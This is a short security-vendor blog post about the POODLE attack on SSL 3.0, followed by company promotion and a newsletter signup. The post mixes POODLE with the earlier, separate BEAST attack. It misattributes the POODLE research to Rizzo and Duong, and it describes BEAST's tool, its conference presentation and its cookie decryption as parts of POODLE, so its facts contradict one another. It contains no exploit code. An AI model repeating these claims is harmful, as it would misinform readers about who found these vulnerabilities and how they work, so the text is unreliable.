Relying ssl

Relying on SSL 3.0 ? POODLE Byte Attack can rip it apart !

Two Google researchers, Juliano Rizzo and Thai Duong have uncovered a security bug in widely used web encryption technology that they say could allow hackers to steal data in what they have dubbed a “Poodle” attack.

“Poodle” stands for Padding Oracle On Downloaded Legacy Encryption.

The problem is an 18-year old encryption standard, known as SSL 3.0, which is still widely used in web browsers and websites. It was disclosed in a research paper published late on Tuesday on the website of the OpenSSL Project, a group that develops the most widely used type of SSL encryption software.

The attack, developed by Juliano Rizzo and Thai Duong, will be presented at the Ekoparty conference in Argentina on Friday, and, unlike many other attacks on TLS and SSL, it has nothing to do with the certificate trust model in the protocol. Instead, the researchers have developed a tool called BEAST that enables them to grab and decrypt HTTPS cookies from active user sessions. The attack can even decrypt cookies that are marked HTTPS only from sites that use HTTP Strict Transport Security, which forces browsers to communicate over TLS/SSL when it’s available. The researchers use what’s known as a block-wise chosen-plaintext attack against the AES encryption algorithm that’s used in TLS/SSL.

To do that, however, they would need to launch a “man-in-the-middle” attack, placing themselves in between the victim and the websites they were visiting. One common approach is to create a rogue WiFi “hot spot” in an Internet cafe.

References:

http://googleonlinesecurity.blogspot.com.au/2014/10/this-poodle-bites-exploiting-ssl-30.html

Indusface
Indusface

Indusface is a leading application security SaaS company that secures critical Web, Mobile, and API applications of 5000+ global customers using its award-winning fully managed platform that integrates web application scanner, web application firewall, DDoS & BOT Mitigation, CDN, and threat intelligence engine.

Join 47000+ Security Leaders

Get weekly tips on blocking ransomware, DDoS and bot attacks and Zero-day threats.

We're committed to your privacy. indusface uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.